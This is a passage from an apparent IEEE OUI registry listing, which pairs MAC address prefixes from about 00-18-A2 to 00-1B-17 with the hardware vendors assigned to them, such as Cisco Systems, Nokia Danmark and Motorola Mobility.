(hex) Tiqit Computers, Inc. 00-18-A2 (hex) XIP Technology AB 00-18-A3 (hex) ZIPPY TECHNOLOGY CORP. 00-18-A4 (hex) Motorola Mobility, Inc. 00-18-A5 (hex) ADigit Technologies Corp. 00-18-A6 (hex) Persistent Systems, LLC 00-18-A7 (hex) Yoggie Security Systems LTD. 00-18-A8 (hex) AnNeal Technology Inc. 00-18-A9 (hex) Ethernet Direct Corporation 00-18-AA (hex) Protec Fire Detection plc 00-18-AB (hex) BEIJING LHWT MICROELECTRONICS INC. 00-18-AC (hex) Shanghai Jiao Da HISYS Technology Co. Ltd. 00-18-AD (hex) NIDEC SANKYO CORPORATION 00-18-AE (hex) TVT CO.,LTD 00-18-AF (hex) Samsung Electronics Co., Ltd. 00-18-B0 (hex) Nortel 00-18-B1 (hex) IBM Corp 00-18-B2 (hex) ADEUNIS RF 00-18-B3 (hex) TEC WizHome Co., Ltd. 00-18-B4 (hex) Dawon Media Inc. 00-18-B5 (hex) Magna Carta 00-18-B6 (hex) S3C, Inc. 00-18-B7 (hex) D3 LED, LLC 00-18-B8 (hex) New Voice International AG 00-18-B9 (hex) Cisco Systems 00-18-BA (hex) Cisco Systems 00-18-BB (hex) Eliwell Controls srl 00-18-BC (hex) ZAO NVP Bolid 00-18-BD (hex) SHENZHEN DVBWORLD TECHNOLOGY CO., LTD. 00-18-BE (hex) ANSA Corporation 00-18-BF (hex) Essence Technology Solution, Inc. 00-18-C0 (hex) Motorola Mobility, Inc. 00-18-C1 (hex) Almitec Informática e Comércio Ltda. 00-18-C2 (hex) Firetide, Inc 00-18-C3 (hex) C&S Microwave 00-18-C4 (hex) Raba Technologies LLC 00-18-C5 (hex) Nokia Danmark A/S 00-18-C6 (hex) OPW Fuel Management Systems 00-18-C7 (hex) Real Time Automation 00-18-C8 (hex) ISONAS Inc. 00-18-C9 (hex) EOps Technology Limited 00-18-CA (hex) Viprinet GmbH 00-18-CB (hex) Tecobest Technology Limited 00-18-CC (hex) AXIOHM SAS 00-18-CD (hex) Erae Electronics Industry Co., Ltd 00-18-CE (hex) Dreamtech Co., Ltd 00-18-CF (hex) Baldor Electric Company 00-18-D0 (hex) AtRoad, A Trimble Company 00-18-D1 (hex) Siemens Home & Office Comm. Devices 00-18-D2 (hex) High-Gain Antennas LLC 00-18-D3 (hex) TEAMCAST 00-18-D4 (hex) Unified Display Interface SIG 00-18-D5 (hex) REIGNCOM 00-18-D6 (hex) Swirlnet A/S 00-18-D7 (hex) Javad Navigation Systems Inc. 00-18-D8 (hex) ARCH METER Corporation 00-18-D9 (hex) Santosha Internatonal, Inc 00-18-DA (hex) AMBER wireless GmbH 00-18-DB (hex) EPL Technology Ltd 00-18-DC (hex) Prostar Co., Ltd. 00-18-DD (hex) Silicondust Engineering Ltd 00-18-DE (hex) Intel Corporation 00-18-DF (hex) The Morey Corporation 00-18-E0 (hex) ANAVEO 00-18-E1 (hex) Verkerk Service Systemen 00-18-E2 (hex) Topdata Sistemas de Automacao Ltda 00-18-E3 (hex) Visualgate Systems, Inc. 00-18-E4 (hex) YIGUANG 00-18-E5 (hex) Adhoco AG 00-18-E6 (hex) Computer Hardware Design SIA 00-18-E7 (hex) Cameo Communications, INC. 00-18-E8 (hex) Hacetron Corporation 00-18-E9 (hex) Numata Corporation 00-18-EA (hex) Alltec GmbH 00-18-EB (hex) BroVis Wireless Networks 00-18-EC (hex) Welding Technology Corporation 00-18-ED (hex) Accutech Ultrasystems Co., Ltd. 00-18-EE (hex) Videology Imaging Solutions, Inc. 00-18-EF (hex) Escape Communications, Inc. 00-18-F0 (hex) JOYTOTO Co., Ltd. 00-18-F1 (hex) Chunichi Denshi Co.,LTD. 00-18-F2 (hex) Beijing Tianyu Communication Equipment Co., Ltd 00-18-F3 (hex) ASUSTek COMPUTER INC. 00-18-F4 (hex) EO TECHNICS Co., Ltd. 00-18-F5 (hex) Shenzhen Streaming Video Technology Company Limited 00-18-F6 (hex) Thomson Telecom Belgium 00-18-F7 (hex) Kameleon Technologies 00-18-F8 (hex) Cisco-Linksys LLC 00-18-F9 (hex) VVOND, Inc. 00-18-FA (hex) Yushin Precision Equipment Co.,Ltd. 00-18-FB (hex) Compro Technology 00-18-FC (hex) Altec Electronic AG 00-18-FD (hex) Optimal Technologies International Inc. 00-18-FE (hex) Hewlett-Packard Company 00-18-FF (hex) PowerQuattro Co. 00-19-00 (hex) Intelliverese - DBA Voicecom 00-19-01 (hex) F1MEDIA 00-19-02 (hex) Cambridge Consultants Ltd 00-19-03 (hex) Bigfoot Networks Inc 00-19-04 (hex) WB Electronics Sp. z o.o. 00-19-05 (hex) SCHRACK Seconet AG 00-19-06 (hex) Cisco Systems 00-19-07 (hex) Cisco Systems 00-19-08 (hex) Duaxes Corporation 00-19-09 (hex) Devi A/S 00-19-0A (hex) HASWARE INC. 00-19-0B (hex) Southern Vision Systems, Inc. 00-19-0C (hex) Encore Electronics, Inc. 00-19-0D (hex) IEEE 1394c 00-19-0E (hex) Atech Technology Co., Ltd. 00-19-0F (hex) Advansus Corp. 00-19-10 (hex) Knick Elektronische Messgeraete GmbH & Co. KG 00-19-11 (hex) Just In Mobile Information Technologies (Shanghai) Co., Ltd. 00-19-12 (hex) Welcat Inc 00-19-13 (hex) Chuang-Yi Network Equipment Co.Ltd. 00-19-14 (hex) Winix Co., Ltd 00-19-15 (hex) TECOM Co., Ltd. 00-19-16 (hex) PayTec AG 00-19-17 (hex) Posiflex Inc. 00-19-18 (hex) Interactive Wear AG 00-19-19 (hex) ASTEL Inc. 00-19-1A (hex) IRLINK 00-19-1B (hex) Sputnik Engineering AG 00-19-1C (hex) Sensicast Systems 00-19-1D (hex) Nintendo Co.,Ltd. 00-19-1E (hex) Beyondwiz Co., Ltd. 00-19-1F (hex) Microlink communications Inc. 00-19-20 (hex) KUME electric Co.,Ltd. 00-19-21 (hex) Elitegroup Computer System Co. 00-19-22 (hex) CM Comandos Lineares 00-19-23 (hex) Phonex Korea Co., LTD. 00-19-24 (hex) LBNL Engineering 00-19-25 (hex) Intelicis Corporation 00-19-26 (hex) BitsGen Co., Ltd. 00-19-27 (hex) ImCoSys Ltd 00-19-28 (hex) Siemens AG, Transportation Systems 00-19-29 (hex) 2M2B Montadora de Maquinas Bahia Brasil LTDA 00-19-2A (hex) Antiope Associates 00-19-2B (hex) Aclara RF Systems Inc. 00-19-2C (hex) Motorola Mobility, Inc. 00-19-2D (hex) Nokia Corporation 00-19-2E (hex) Spectral Instruments, Inc. 00-19-2F (hex) Cisco Systems 00-19-30 (hex) Cisco Systems 00-19-31 (hex) Balluff GmbH 00-19-32 (hex) Gude Analog- und Digialsysteme GmbH 00-19-33 (hex) Strix Systems, Inc. 00-19-34 (hex) TRENDON TOUCH TECHNOLOGY CORP. 00-19-35 (hex) Duerr Dental GmbH & Co. KG 00-19-36 (hex) STERLITE OPTICAL TECHNOLOGIES LIMITED 00-19-37 (hex) CommerceGuard AB 00-19-38 (hex) UMB Communications Co., Ltd. 00-19-39 (hex) Gigamips 00-19-3A (hex) OESOLUTIONS 00-19-3B (hex) Wilibox Deliberant Group LLC 00-19-3C (hex) HighPoint Technologies Incorporated 00-19-3D (hex) GMC Guardian Mobility Corp. 00-19-3E (hex) PIRELLI BROADBAND SOLUTIONS 00-19-3F (hex) RDI technology(Shenzhen) Co.,LTD 00-19-40 (hex) Rackable Systems 00-19-41 (hex) Pitney Bowes, Inc 00-19-42 (hex) ON SOFTWARE INTERNATIONAL LIMITED 00-19-43 (hex) Belden 00-19-44 (hex) Fossil Partners, L.P. 00-19-45 (hex) Ten-Tec Inc. 00-19-46 (hex) Cianet Industria e Comercio S/A 00-19-47 (hex) Scientific Atlanta, A Cisco Company 00-19-48 (hex) AireSpider Networks 00-19-49 (hex) TENTEL COMTECH CO., LTD. 00-19-4A (hex) TESTO AG 00-19-4B (hex) SAGEM COMMUNICATION 00-19-4C (hex) Fujian Stelcom information & Technology CO.,Ltd 00-19-4D (hex) Avago Technologies Sdn Bhd 00-19-4E (hex) Ultra Electronics - TCS (Tactical Communication Systems) 00-19-4F (hex) Nokia Danmark A/S 00-19-50 (hex) Harman Multimedia 00-19-51 (hex) NETCONS, s.r.o. 00-19-52 (hex) ACOGITO Co., Ltd 00-19-53 (hex) Chainleader Communications Corp. 00-19-54 (hex) Leaf Corporation. 00-19-55 (hex) Cisco Systems 00-19-56 (hex) Cisco Systems 00-19-57 (hex) Saafnet Canada Inc. 00-19-58 (hex) Bluetooth SIG, Inc. 00-19-59 (hex) Staccato Communications Inc. 00-19-5A (hex) Jenaer Antriebstechnik GmbH 00-19-5B (hex) D-Link Corporation 00-19-5C (hex) Innotech Corporation 00-19-5D (hex) ShenZhen XinHuaTong Opto Electronics Co.,Ltd 00-19-5E (hex) Motorola Mobility, Inc. 00-19-5F (hex) Valemount Networks Corporation 00-19-60 (hex) DoCoMo Systems, Inc. 00-19-61 (hex) Blaupunkt GmbH 00-19-62 (hex) Commerciant, LP 00-19-63 (hex) Sony Ericsson Mobile Communications AB 00-19-64 (hex) Doorking Inc. 00-19-65 (hex) YuHua TelTech (ShangHai) Co., Ltd. 00-19-66 (hex) Asiarock Technology Limited 00-19-67 (hex) TELDAT Sp.J. 00-19-68 (hex) Digital Video Networks(Shanghai) CO. LTD. 00-19-69 (hex) Nortel 00-19-6A (hex) MikroM GmbH 00-19-6B (hex) Danpex Corporation 00-19-6C (hex) ETROVISION TECHNOLOGY 00-19-6D (hex) Raybit Systems Korea, Inc 00-19-6E (hex) Metacom (Pty) Ltd. 00-19-6F (hex) SensoPart GmbH 00-19-70 (hex) Z-Com, Inc. 00-19-71 (hex) Guangzhou Unicomp Technology Co.,Ltd 00-19-72 (hex) Plexus (Xiamen) Co.,ltd 00-19-73 (hex) Zeugma Systems 00-19-74 (hex) AboCom Systems, Inc. 00-19-75 (hex) Beijing Huisen networks technology Inc 00-19-76 (hex) Xipher Technologies, LLC 00-19-77 (hex) Aerohive Networks, Inc. 00-19-78 (hex) Datum Systems, Inc. 00-19-79 (hex) Nokia Danmark A/S 00-19-7A (hex) MAZeT GmbH 00-19-7B (hex) Picotest Corp. 00-19-7C (hex) Riedel Communications GmbH 00-19-7D (hex) Hon Hai Precision Ind. Co., Ltd 00-19-7E (hex) Hon Hai Precision Ind. Co., Ltd 00-19-7F (hex) PLANTRONICS, INC. 00-19-80 (hex) Gridpoint Systems 00-19-81 (hex) Vivox Inc 00-19-82 (hex) SmarDTV 00-19-83 (hex) CCT R&D Limited 00-19-84 (hex) ESTIC Corporation 00-19-85 (hex) IT Watchdogs, Inc 00-19-86 (hex) Cheng Hongjian 00-19-87 (hex) Panasonic Mobile Communications Co., Ltd. 00-19-88 (hex) Wi2Wi, Inc 00-19-89 (hex) Sonitrol Corporation 00-19-8A (hex) Northrop Grumman Systems Corp. 00-19-8B (hex) Novera Optics Korea, Inc. 00-19-8C (hex) iXSea 00-19-8D (hex) Ocean Optics, Inc. 00-19-8E (hex) Oticon A/S 00-19-8F (hex) Alcatel Bell N.V. 00-19-90 (hex) ELM DATA Co., Ltd. 00-19-91 (hex) avinfo 00-19-92 (hex) Bluesocket, Inc 00-19-93 (hex) Changshu Switchgear MFG. Co.,Ltd. (Former Changshu Switchgea 00-19-94 (hex) Jorjin Technologies Inc. 00-19-95 (hex) Jurong Hi-Tech (Suzhou)Co.ltd 00-19-96 (hex) TurboChef Technologies Inc. 00-19-97 (hex) Soft Device Sdn Bhd 00-19-98 (hex) SATO CORPORATION 00-19-99 (hex) Fujitsu Technology Solutions 00-19-9A (hex) EDO-EVI 00-19-9B (hex) Diversified Technical Systems, Inc. 00-19-9C (hex) CTRING 00-19-9D (hex) VIZIO, Inc. 00-19-9E (hex) SHOWADENSHI ELECTRONICS,INC. 00-19-9F (hex) DKT A/S 00-19-A0 (hex) NIHON DATA SYSTENS, INC. 00-19-A1 (hex) LG INFORMATION & COMM. 00-19-A2 (hex) ORDYN TECHNOLOGIES 00-19-A3 (hex) asteel electronique atlantique 00-19-A4 (hex) Austar Technology (hang zhou) Co.,Ltd 00-19-A5 (hex) RadarFind Corporation 00-19-A6 (hex) Motorola Mobility, Inc. 00-19-A7 (hex) ITU-T 00-19-A8 (hex) WiQuest Communications 00-19-A9 (hex) Cisco Systems 00-19-AA (hex) Cisco Systems 00-19-AB (hex) Raycom CO ., LTD 00-19-AC (hex) GSP SYSTEMS Inc. 00-19-AD (hex) BOBST SA 00-19-AE (hex) Hopling Technologies b.v. 00-19-AF (hex) Rigol Technologies, Inc. 00-19-B0 (hex) HanYang System 00-19-B1 (hex) Arrow7 Corporation 00-19-B2 (hex) XYnetsoft Co.,Ltd 00-19-B3 (hex) Stanford Research Systems 00-19-B4 (hex) VideoCast Ltd. 00-19-B5 (hex) Famar Fueguina S.A. 00-19-B6 (hex) Euro Emme s.r.l. 00-19-B7 (hex) Nokia Danmark A/S 00-19-B8 (hex) Boundary Devices 00-19-B9 (hex) Dell Inc. 00-19-BA (hex) Paradox Security Systems Ltd 00-19-BB (hex) Hewlett-Packard Company 00-19-BC (hex) ELECTRO CHANCE SRL 00-19-BD (hex) New Media Life 00-19-BE (hex) Altai Technologies Limited 00-19-BF (hex) Citiway technology Co.,ltd 00-19-C0 (hex) Motorola Mobility, Inc. 00-19-C1 (hex) Alps Electric Co., Ltd 00-19-C2 (hex) Equustek Solutions, Inc. 00-19-C3 (hex) Qualitrol 00-19-C4 (hex) Infocrypt Inc. 00-19-C5 (hex) SONY Computer Entertainment inc, 00-19-C6 (hex) ZTE Corporation 00-19-C7 (hex) Cambridge Industries(Group) Co.,Ltd. 00-19-C8 (hex) AnyDATA Corporation 00-19-C9 (hex) S&C ELECTRIC COMPANY 00-19-CA (hex) Broadata Communications, Inc 00-19-CB (hex) ZyXEL Communications Corporation 00-19-CC (hex) RCG (HK) Ltd 00-19-CD (hex) Chengdu ethercom information technology Ltd. 00-19-CE (hex) Progressive Gaming International 00-19-CF (hex) SALICRU, S.A. 00-19-D0 (hex) Cathexis 00-19-D1 (hex) Intel Corporation 00-19-D2 (hex) Intel Corporation 00-19-D3 (hex) TRAK Microwave 00-19-D4 (hex) ICX Technologies 00-19-D5 (hex) IP Innovations, Inc. 00-19-D6 (hex) LS Cable Ltd. 00-19-D7 (hex) FORTUNETEK CO., LTD 00-19-D8 (hex) MAXFOR 00-19-D9 (hex) Zeutschel GmbH 00-19-DA (hex) Welltrans O&E Technology Co. , Ltd. 00-19-DB (hex) MICRO-STAR INTERNATIONAL CO., LTD. 00-19-DC (hex) ENENSYS Technologies 00-19-DD (hex) FEI-Zyfer, Inc. 00-19-DE (hex) MOBITEK 00-19-DF (hex) Thomson Inc. 00-19-E0 (hex) TP-LINK Technologies Co., Ltd. 00-19-E1 (hex) Nortel 00-19-E2 (hex) Juniper Networks 00-19-E3 (hex) Apple Computer Inc. 00-19-E4 (hex) 2Wire, Inc 00-19-E5 (hex) Lynx Studio Technology, Inc. 00-19-E6 (hex) TOYO MEDIC CO.,LTD. 00-19-E7 (hex) Cisco Systems 00-19-E8 (hex) Cisco Systems 00-19-E9 (hex) S-Information Technolgy, Co., Ltd. 00-19-EA (hex) TeraMage Technologies Co., Ltd. 00-19-EB (hex) Pyronix Ltd 00-19-EC (hex) Sagamore Systems, Inc. 00-19-ED (hex) Axesstel Inc. 00-19-EE (hex) CARLO GAVAZZI CONTROLS SPA-Controls Division 00-19-EF (hex) SHENZHEN LINNKING ELECTRONICS CO.,LTD 00-19-F0 (hex) UNIONMAN TECHNOLOGY CO.,LTD 00-19-F1 (hex) Star Communication Network Technology Co.,Ltd 00-19-F2 (hex) Teradyne K.K. 00-19-F3 (hex) Cetis, Inc 00-19-F4 (hex) Convergens Oy Ltd 00-19-F5 (hex) Imagination Technologies Ltd 00-19-F6 (hex) Acconet (PTE) Ltd 00-19-F7 (hex) Onset Computer Corporation 00-19-F8 (hex) Embedded Systems Design, Inc. 00-19-F9 (hex) TDK-Lambda 00-19-FA (hex) Cable Vision Electronics CO., LTD. 00-19-FB (hex) BSkyB Ltd 00-19-FC (hex) PT. Ufoakses Sukses Luarbiasa 00-19-FD (hex) Nintendo Co., Ltd. 00-19-FE (hex) SHENZHEN SEECOMM TECHNOLOGY CO.,LTD. 00-19-FF (hex) Finnzymes 00-1A-00 (hex) MATRIX INC. 00-1A-01 (hex) Smiths Medical 00-1A-02 (hex) SECURE CARE PRODUCTS, INC 00-1A-03 (hex) Angel Electronics Co., Ltd. 00-1A-04 (hex) Interay Solutions BV 00-1A-05 (hex) OPTIBASE LTD 00-1A-06 (hex) OpVista, Inc. 00-1A-07 (hex) Arecont Vision 00-1A-08 (hex) Dalman Technical Services 00-1A-09 (hex) Wayfarer Transit Systems Ltd 00-1A-0A (hex) Adaptive Micro-Ware Inc. 00-1A-0B (hex) BONA TECHNOLOGY INC. 00-1A-0C (hex) Swe-Dish Satellite Systems AB 00-1A-0D (hex) HandHeld entertainment, Inc. 00-1A-0E (hex) Cheng Uei Precision Industry Co.,Ltd 00-1A-0F (hex) Sistemas Avanzados de Control, S.A. 00-1A-10 (hex) LUCENT TRANS ELECTRONICS CO.,LTD 00-1A-11 (hex) Google Inc. 00-1A-12 (hex) Essilor 00-1A-13 (hex) Wanlida Group Co., LTD 00-1A-14 (hex) Xin Hua Control Engineering Co.,Ltd. 00-1A-15 (hex) gemalto e-Payment 00-1A-16 (hex) Nokia Danmark A/S 00-1A-17 (hex) Teak Technologies, Inc. 00-1A-18 (hex) Advanced Simulation Technology inc. 00-1A-19 (hex) Computer Engineering Limited 00-1A-1A (hex) Gentex Corporation/Electro-Acoustic Products 00-1A-1B (hex) Motorola Mobility, Inc. 00-1A-1C (hex) GT&T Engineering Pte Ltd 00-1A-1D (hex) PChome Online Inc. 00-1A-1E (hex) Aruba Networks 00-1A-1F (hex) Coastal Environmental Systems 00-1A-20 (hex) CMOTECH Co. Ltd. 00-1A-21 (hex) Indac B.V. 00-1A-22 (hex) eQ-3 Entwicklung GmbH 00-1A-23 (hex) Ice Qube, Inc 00-1A-24 (hex) Galaxy Telecom Technologies Ltd 00-1A-25 (hex) DELTA DORE 00-1A-26 (hex) Deltanode Solutions AB 00-1A-27 (hex) Ubistar 00-1A-28 (hex) ASWT Co., LTD. Taiwan Branch H.K. 00-1A-29 (hex) Techsonic Industries d/b/a Humminbird 00-1A-2A (hex) Arcadyan Technology Corporation 00-1A-2B (hex) Ayecom Technology Co., Ltd. 00-1A-2C (hex) SATEC Co.,LTD 00-1A-2D (hex) The Navvo Group 00-1A-2E (hex) Ziova Coporation 00-1A-2F (hex) Cisco Systems 00-1A-30 (hex) Cisco Systems 00-1A-31 (hex) SCAN COIN Industries AB 00-1A-32 (hex) ACTIVA MULTIMEDIA 00-1A-33 (hex) ASI Communications, Inc. 00-1A-34 (hex) Konka Group Co., Ltd. 00-1A-35 (hex) BARTEC GmbH 00-1A-36 (hex) Aipermon GmbH & Co. KG 00-1A-37 (hex) Lear Corporation 00-1A-38 (hex) Sanmina-SCI 00-1A-39 (hex) Merten GmbH&CoKG 00-1A-3A (hex) Dongahelecomm 00-1A-3B (hex) Doah Elecom Inc. 00-1A-3C (hex) Technowave Ltd. 00-1A-3D (hex) Ajin Vision Co.,Ltd 00-1A-3E (hex) Faster Technology LLC 00-1A-3F (hex) intelbras 00-1A-40 (hex) A-FOUR TECH CO., LTD. 00-1A-41 (hex) INOCOVA Co.,Ltd 00-1A-42 (hex) Techcity Technology co., Ltd. 00-1A-43 (hex) Logical Link Communications 00-1A-44 (hex) JWTrading Co., Ltd 00-1A-45 (hex) GN Netcom as 00-1A-46 (hex) Digital Multimedia Technology Co., Ltd 00-1A-47 (hex) Agami Systems, Inc. 00-1A-48 (hex) Takacom Corporation 00-1A-49 (hex) Micro Vision Co.,LTD 00-1A-4A (hex) Qumranet Inc. 00-1A-4B (hex) Hewlett-Packard Company 00-1A-4C (hex) Crossbow Technology, Inc 00-1A-4D (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 00-1A-4E (hex) NTI AG / LinMot 00-1A-4F (hex) AVM GmbH 00-1A-50 (hex) PheeNet Technology Corp. 00-1A-51 (hex) Alfred Mann Foundation 00-1A-52 (hex) Meshlinx Wireless Inc. 00-1A-53 (hex) Zylaya 00-1A-54 (hex) Hip Shing Electronics Ltd. 00-1A-55 (hex) ACA-Digital Corporation 00-1A-56 (hex) ViewTel Co,. Ltd. 00-1A-57 (hex) Matrix Design Group, LLC 00-1A-58 (hex) CCV Deutschland GmbH - Celectronic eHealth Div. 00-1A-59 (hex) Ircona 00-1A-5A (hex) Korea Electric Power Data Network (KDN) Co., Ltd 00-1A-5B (hex) NetCare Service Co., Ltd. 00-1A-5C (hex) Euchner GmbH+Co. KG 00-1A-5D (hex) Mobinnova Corp. 00-1A-5E (hex) Thincom Technology Co.,Ltd 00-1A-5F (hex) KitWorks.fi Ltd. 00-1A-60 (hex) Wave Electronics Co.,Ltd. 00-1A-61 (hex) PacStar Corp. 00-1A-62 (hex) Data Robotics, Incorporated 00-1A-63 (hex) Elster Solutions, LLC, 00-1A-64 (hex) IBM Corp 00-1A-65 (hex) Seluxit 00-1A-66 (hex) Motorola Mobility, Inc. 00-1A-67 (hex) Infinite QL Sdn Bhd 00-1A-68 (hex) Weltec Enterprise Co., Ltd. 00-1A-69 (hex) Wuhan Yangtze Optical Technology CO.,Ltd. 00-1A-6A (hex) Tranzas, Inc. 00-1A-6B (hex) Universal Global Scientific Industrial Co., Ltd. 00-1A-6C (hex) Cisco Systems 00-1A-6D (hex) Cisco Systems 00-1A-6E (hex) Impro Technologies 00-1A-6F (hex) MI.TEL s.r.l. 00-1A-70 (hex) Cisco-Linksys, LLC 00-1A-71 (hex) Diostech Co., Ltd. 00-1A-72 (hex) Mosart Semiconductor Corp. 00-1A-73 (hex) Gemtek Technology Co., Ltd. 00-1A-74 (hex) Procare International Co 00-1A-75 (hex) Sony Ericsson Mobile Communications 00-1A-76 (hex) SDT information Technology Co.,LTD. 00-1A-77 (hex) Motorola Mobility, Inc. 00-1A-78 (hex) ubtos 00-1A-79 (hex) TELECOMUNICATION TECHNOLOGIES LTD. 00-1A-7A (hex) Lismore Instruments Limited 00-1A-7B (hex) Teleco, Inc. 00-1A-7C (hex) Hirschmann Multimedia B.V. 00-1A-7D (hex) cyber-blue(HK)Ltd 00-1A-7E (hex) LN Srithai Comm Ltd. 00-1A-7F (hex) GCI Science&Technology Co.,Ltd. 00-1A-80 (hex) Sony Corporation 00-1A-81 (hex) Zelax 00-1A-82 (hex) PROBA Building Automation Co.,LTD 00-1A-83 (hex) Pegasus Technologies Inc. 00-1A-84 (hex) V One Multimedia Pte Ltd 00-1A-85 (hex) NV Michel Van de Wiele 00-1A-86 (hex) AdvancedIO Systems Inc 00-1A-87 (hex) Canhold International Limited 00-1A-88 (hex) Venergy,Co,Ltd 00-1A-89 (hex) Nokia Danmark A/S 00-1A-8A (hex) Samsung Electronics Co., Ltd. 00-1A-8B (hex) CHUNIL ELECTRIC IND., CO. 00-1A-8C (hex) Astaro AG 00-1A-8D (hex) AVECS Bergen GmbH 00-1A-8E (hex) 3Way Networks Ltd 00-1A-8F (hex) Nortel 00-1A-90 (hex) Trópico Sistemas e Telecomunicações da Amazônia LTDA. 00-1A-91 (hex) FusionDynamic Ltd. 00-1A-92 (hex) ASUSTek COMPUTER INC. 00-1A-93 (hex) ERCO Leuchten GmbH 00-1A-94 (hex) Votronic GmbH 00-1A-95 (hex) Hisense Mobile Communications Technoligy Co.,Ltd. 00-1A-96 (hex) ECLER S.A. 00-1A-97 (hex) fitivision technology Inc. 00-1A-98 (hex) Asotel Communication Limited Taiwan Branch 00-1A-99 (hex) Smarty (HZ) Information Electronics Co., Ltd 00-1A-9A (hex) Skyworth Digital technology(shenzhen)co.ltd. 00-1A-9B (hex) ADEC & Parter AG 00-1A-9C (hex) RightHand Technologies, Inc. 00-1A-9D (hex) Skipper Wireless, Inc. 00-1A-9E (hex) ICON Digital International Limited 00-1A-9F (hex) A-Link Europe Ltd 00-1A-A0 (hex) Dell Inc 00-1A-A1 (hex) Cisco Systems 00-1A-A2 (hex) Cisco Systems 00-1A-A3 (hex) DELORME 00-1A-A4 (hex) Future University-Hakodate 00-1A-A5 (hex) BRN Phoenix 00-1A-A6 (hex) Telefunken Radio Communication Systems GmbH &CO.KG 00-1A-A7 (hex) Torian Wireless 00-1A-A8 (hex) Mamiya Digital Imaging Co., Ltd. 00-1A-A9 (hex) FUJIAN STAR-NET COMMUNICATION CO.,LTD 00-1A-AA (hex) Analogic Corp. 00-1A-AB (hex) eWings s.r.l. 00-1A-AC (hex) Corelatus AB 00-1A-AD (hex) Motorola Mobility, Inc. 00-1A-AE (hex) Savant Systems LLC 00-1A-AF (hex) BLUSENS TECHNOLOGY 00-1A-B0 (hex) Signal Networks Pvt. Ltd., 00-1A-B1 (hex) Asia Pacific Satellite Industries Co., Ltd. 00-1A-B2 (hex) Cyber Solutions Inc. 00-1A-B3 (hex) VISIONITE INC. 00-1A-B4 (hex) FFEI Ltd. 00-1A-B5 (hex) Home Network System 00-1A-B6 (hex) Texas Instruments 00-1A-B7 (hex) Ethos Networks LTD. 00-1A-B8 (hex) Anseri Corporation 00-1A-B9 (hex) PMC 00-1A-BA (hex) Caton Overseas Limited 00-1A-BB (hex) Fontal Technology Incorporation 00-1A-BC (hex) U4EA Technologies Ltd 00-1A-BD (hex) Impatica Inc. 00-1A-BE (hex) COMPUTER HI-TECH INC. 00-1A-BF (hex) TRUMPF Laser Marking Systems AG 00-1A-C0 (hex) JOYBIEN TECHNOLOGIES CO., LTD. 00-1A-C1 (hex) 3Com Ltd 00-1A-C2 (hex) YEC Co.,Ltd. 00-1A-C3 (hex) Scientific-Atlanta, Inc 00-1A-C4 (hex) 2Wire, Inc 00-1A-C5 (hex) BreakingPoint Systems, Inc. 00-1A-C6 (hex) Micro Control Designs 00-1A-C7 (hex) UNIPOINT 00-1A-C8 (hex) ISL (Instrumentation Scientifique de Laboratoire) 00-1A-C9 (hex) SUZUKEN CO.,LTD 00-1A-CA (hex) Tilera Corporation 00-1A-CB (hex) Autocom Products Ltd 00-1A-CC (hex) Celestial Semiconductor, Ltd 00-1A-CD (hex) Tidel Engineering LP 00-1A-CE (hex) YUPITERU CORPORATION 00-1A-CF (hex) C.T. ELETTRONICA 00-1A-D0 (hex) Albis Technologies AG 00-1A-D1 (hex) FARGO CO., LTD. 00-1A-D2 (hex) Eletronica Nitron Ltda 00-1A-D3 (hex) Vamp Ltd. 00-1A-D4 (hex) iPOX Technology Co., Ltd. 00-1A-D5 (hex) KMC CHAIN INDUSTRIAL CO., LTD. 00-1A-D6 (hex) JIAGNSU AETNA ELECTRIC CO.,LTD 00-1A-D7 (hex) Christie Digital Systems, Inc. 00-1A-D8 (hex) AlsterAero GmbH 00-1A-D9 (hex) International Broadband Electric Communications, Inc. 00-1A-DA (hex) Biz-2-Me Inc. 00-1A-DB (hex) Motorola Mobility, Inc. 00-1A-DC (hex) Nokia Danmark A/S 00-1A-DD (hex) PePWave Ltd 00-1A-DE (hex) Motorola Mobility, Inc. 00-1A-DF (hex) Interactivetv Pty Limited 00-1A-E0 (hex) Mythology Tech Express Inc. 00-1A-E1 (hex) EDGE ACCESS INC 00-1A-E2 (hex) Cisco Systems 00-1A-E3 (hex) Cisco Systems 00-1A-E4 (hex) Medicis Technologies Corporation 00-1A-E5 (hex) Mvox Technologies Inc. 00-1A-E6 (hex) Atlanta Advanced Communications Holdings Limited 00-1A-E7 (hex) Aztek Networks, Inc. 00-1A-E8 (hex) Siemens Enterprise Communications GmbH & Co. KG 00-1A-E9 (hex) Nintendo Co., Ltd. 00-1A-EA (hex) Radio Terminal Systems Pty Ltd 00-1A-EB (hex) Allied Telesis K.K. 00-1A-EC (hex) Keumbee Electronics Co.,Ltd. 00-1A-ED (hex) INCOTEC GmbH 00-1A-EE (hex) Shenztech Ltd 00-1A-EF (hex) Loopcomm Technology, Inc. 00-1A-F0 (hex) Alcatel - IPD 00-1A-F1 (hex) Embedded Artists AB 00-1A-F2 (hex) Dynavisions Schweiz AG 00-1A-F3 (hex) Samyoung Electronics 00-1A-F4 (hex) Handreamnet 00-1A-F5 (hex) PENTAONE. CO., LTD. 00-1A-F6 (hex) Woven Systems, Inc. 00-1A-F7 (hex) dataschalt e+a GmbH 00-1A-F8 (hex) Copley Controls Corporation 00-1A-F9 (hex) AeroVIronment (AV Inc) 00-1A-FA (hex) Welch Allyn, Inc. 00-1A-FB (hex) Joby Inc. 00-1A-FC (hex) ModusLink Corporation 00-1A-FD (hex) EVOLIS 00-1A-FE (hex) SOFACREAL 00-1A-FF (hex) Wizyoung Tech. 00-1B-00 (hex) Neopost Technologies 00-1B-01 (hex) Applied Radio Technologies 00-1B-02 (hex) ED Co.Ltd 00-1B-03 (hex) Action Technology (SZ) Co., Ltd 00-1B-04 (hex) Affinity International S.p.a 00-1B-05 (hex) YMC AG 00-1B-06 (hex) Ateliers R. LAUMONIER 00-1B-07 (hex) Mendocino Software 00-1B-08 (hex) Danfoss Drives A/S 00-1B-09 (hex) Matrix Telecom Pvt. Ltd. 00-1B-0A (hex) Intelligent Distributed Controls Ltd 00-1B-0B (hex) Phidgets Inc. 00-1B-0C (hex) Cisco Systems 00-1B-0D (hex) Cisco Systems 00-1B-0E (hex) InoTec GmbH Organisationssysteme 00-1B-0F (hex) Petratec 00-1B-10 (hex) ShenZhen Kang Hui Technology Co.,ltd 00-1B-11 (hex) D-Link Corporation 00-1B-12 (hex) Apprion 00-1B-13 (hex) Icron Technologies Corporation 00-1B-14 (hex) Carex Lighting Equipment Factory 00-1B-15 (hex) Voxtel, Inc. 00-1B-16 (hex) Celtro Ltd. 00-1B-17 